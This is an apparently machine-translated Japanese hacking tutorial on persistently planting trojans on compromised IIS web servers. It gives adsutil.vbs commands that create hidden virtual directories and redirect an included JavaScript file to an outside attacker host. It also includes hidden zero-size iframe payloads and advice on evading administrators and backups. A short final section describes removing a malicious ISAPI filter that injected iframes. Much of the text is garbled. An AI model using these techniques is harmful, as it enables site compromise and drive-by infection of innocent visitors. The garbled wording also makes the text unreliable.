最新のアクセス権なしのサスペンション方式


また、海外のいくつかのマシンでは、どのような権限を持っていますか?彼はどうやって書くのか分かりません。せっかく文書を書いても、すぐに戻ってきません。本当に素晴らしいです。重要なファイルを監視できるソフトがあって、変更が発見されると元に戻ります。例えばウェブディレクトリを監視していると彼のサイトの内容を変更することができなくなります。でも、エビの多い文章を読んで、自分も少し研究して、やっとものを考えてきました。何の書類も書かなくても、他人のページを塗り替えたり、みんながよく伝説している掛け馬を書き直したりすることができます。ご存知のように、私達はウェブサイトを閲覧する時はサーバーで情報をHtml方式に処理して戻してくれます。私達が実現するのはお客様が訪問する時にブラウザの内容を変えて、木馬などの私達のものを隠して実行させます。一般的な方法としては、Frameを導入し、プロパティを設定して彼をページで見られないようにしたり、あるいは死ぬのを恐れないようにjavascriptでジャンプしたり、高級点を比較すると、scriptタグやframeマークなどの元のコードのHtml元素を利用して、これらのマークに導入された他のファイルやページに細工をしたり、ホームページに表示するデータベースの内容を変更したりします。データベース内の公告を修正すると、掛け馬が実現されます。しかし、これらはサーバーの元のコードであるリガのものやウェブサイトの内容を修正する必要があります。スパンにしても、直接コードを修正しても、これは発見されやすいことです。また、いくつかのページが書いてはいけないです。私たちも落ち込んでいます。もっと隠して安全なサスペンションを探して、上記の問題を解決する必要があります。まずIisマネージャに行ってみましょう。ページを選択して、彼の属性を図1のように見てください。へへ,資源があってリダイレクトしましょう!もし私達はこのページを私達がコントロールしているページにリダイレクトしたら、ブラウザがこのページを要求する時、代わりに私達が定義したページにアクセスします。もしこのページが木馬ページだったら?明らかに、訪問者は馬に引っかかることになります。これは簡単な方法です。 IIsでページのリダイレクトを変更すればいいです。IISマネージャに接触できる人は誰でも簡単にできます。でも、これはまだ問題があります。管理人がページが常にジャンプされていることを発見したら、サイトのファイルをチェックしたり、バックアップなどで回復しても問題が解決されない場合、彼は必ずIISに見に行きます。うっかりホームページのプロパティを見たら、どこかに問題があったら、すぐに変えられます。じゃ、もっと隠れた方法がありますか?昔のランナーの助けを借りて、ホームページが見つかりやすいなら、ホームページの中のHtmlマークを見てみましょう。他のページを呼び出しているのを見つけたら、簡単です。例えば、ホームページにはこんなマークがあります。 src=include/mm 2.js>では、私達は方法があります。include/mms 2.jsの属性を修正しましょう。図二のように、私達のあるページに移ったら、内容はもちろんscriptタグの中で説明できるようになります。 style=display:none; src=http://jnclovesw.com width=0 height=0>e>";;これで私たちのページを紹介できます。もちろん彼のJSの機能を先に実現したほうがいいです。それでこそ人目につかない。管理人はトップページが変更されていないことを発見します。IIsに行きます。 トップページのプロパティを見ても変更されていません。本体の中のwwwファイルさえも修正されていません。彼は憂鬱でしょう。ふふっ!彼が以前のサイトのバックアップを元に戻すだけでは、ページを元に戻すことはできません。IIsファイルが多いので、彼は属性をいちいち見ることができないでしょう。ここで質問がありますが、過去にリダイレクトされたファイルを選択すると、彼のhtml印を引用して説明できます。そうでなければ効果がありません。例えば一つ src=1.jpgを私達のトロイの木馬ページにリダイレクトするのは役に立ちません。木馬ページはHtml解析として扱われていないので、こちらのタグに送って写真とします。私が思い付いたのは利用できるマークです。つまり、scriptとframeがあります。Cssというのは利用できると思いますが、利用方法はまだ見つけられません。私の分析が正しいかどうか分かりませんが、皆さん、教えてください。続けましょう。もしあなたの管理人がとても上手だったり、勤勉だったりすれば、彼はあなたがMM.jsの上で手足を作ったことを発見しました。彼はIIsの中から彼を回復します。私達の夢はまた破れました。もっと隠れる方法がありますか?管理人をIIIsの中に入れても見つけられないですか?答えは肯定です。みんなはきっととても長い前のIIS配置の穴を覚えています。見えない仮想カタログを作って、中に裏口を作ります。私達も借りて利用できますよ。IIS配置の穴の原理を見てください。物理ディレクトリがない仮想ディレクトリを作ると、IIIsには見えなくなります。このディレクトリで小さな動作ができます。ここではまず目に見えない仮想ディレクトリを作成します。もしホームページからincludeフォルダの下のjsファイルを呼び出したら、includeディレクトリを作成します。これはIISを借りることができます アドレスティル.vbsスクリプトは、C:InetpubAdminScripptsのようなIIISアクションを制御するスクリプトであり、私たちが使用するコマンドは以下の通りです。 adsutil.vbs クリアー W 3 SVC/1/Root/www/include "IIsWebVirtual Dir「これでIIIsには見えない仮想ディレクトリができます。パスが設定されていないので、表示されません。それからまたこのカタログの下にm.jsという仮想カタログを作ります。仮想ディレクトリを作るのに使うことができます。などの特殊文字:cscript adsutil.vbs クリアー W 3 SVC/1/Root/www/include/mm 2.js "IIsWebVirtual Dir「これでinclude/mm 2.jsの仮想ディレクトリが存在します。何を思い出しましたか?ホームページで呼び出されたファイルの名前とずっと同じですか?私たちはこれから続けます。cscript adsutil.vbs セット W 3 SVC/1/Root/www/include/mm 2.js/httpredirect "http://jnclovesw.com/mm1.jsこのように、図3のように、MM.js仮想ディレクトリのリダイレクト特性を変更します。注意その中のW 3 SVC/1/Root/www/IIIIsの下の最初のウェブサーバーを代表するwww仮想ディレクトリは、みんなが知らないならadsutil.vbsのenumパラメータで自分が変更したいウェブサイトを調べられます。他の操作は開けられます。 adsutil.vbsスクリプトの助けを見てください。このように操作すると仮想ディレクトリのリダイレクト特性が設定されます。今ホームページでinclude/mm 2.jsを呼び出してみます。 mm 2.jsの内容ですか?それとも私達のmm 1.jsの内容ですか?答えはmm 1.jsです。図4のように物理ファイルはまだあります。これはIISの特性かもしれません。彼はまずユーザの要求を処理して、仮想ディレクトリは物理ファイルより優先します。そしてIISに行って、includeの仮想カタログがあるかどうか見てみましょう。図5のように、ないでしょう。ふふっ!これで成功したのは権限の制限と管理人の検査を許すことです。私達のトロイの木馬を相手のウェブサイトに掛けて、しかも相手がIIIsを作り直してあるいは私達の隠れている仮想ディレクトリを削除しない限り、さもなくば彼は私達のトロイの木馬を一掃するのが難しいです!文章はとても簡単で、肝心な点はIISシナリオの命令とIIIsに対する認識で、このような馬をかける方式は管理人の権限を得た後に馬を切ることに適して、あれらに対処してただまめなだけの管理人はやはりとても役に立ちます!みんなは後でウェブサイトの問題があることを発見して、この脚本を使って調べて大丈夫ですか?いっそIISの設定もバックアップしましょう。問題があったらIIIsの設定も元に戻してください。2.全サーバーが停止されました。 ウェブソースのファイルの中でハンマコードのサーバーが見つかりませんでした。 ほぼすべてのサイトがホームページを開いています。 HTMLページでも 全部出ました。8)e src="http://xxxdfsfd/web.htm「 ヘight=0 width=0>eというスタイルのコードです。 普通は頭の中にいます ウイルス対策ソフトの一部は、HTMLまたはASPを開いてウイルスを報告します。 PHPページ ソースの中ではどうしてもこのコードが見つかりません。最初はJSを疑っています。 長い間探しましたが、まだ見つけられませんでした。 新規のHTMLページに接続します。 このコードもあります。よく探してください。 問題はIISにあるべきです。 IISを開く 再起動 メインIISに 右クリックのプロパティ ISAPI ISAPIの拡張子を発見しました。 見たことがないパスはc:windowshelpwanps.dllです。 ISAPロード正常 緑の状態がキャンセルされました IISを再起動する すべてのコードの消失ローディング項目には三つのファイルが含まれています。wanps.iniの内容は、Cookie=GAG 5=ABCDEFG Redirector=C:windowshelpwanps.txtの内容は:<8)eです。 src="http://xxx.com/web.htm「 ヘight=0 width=0>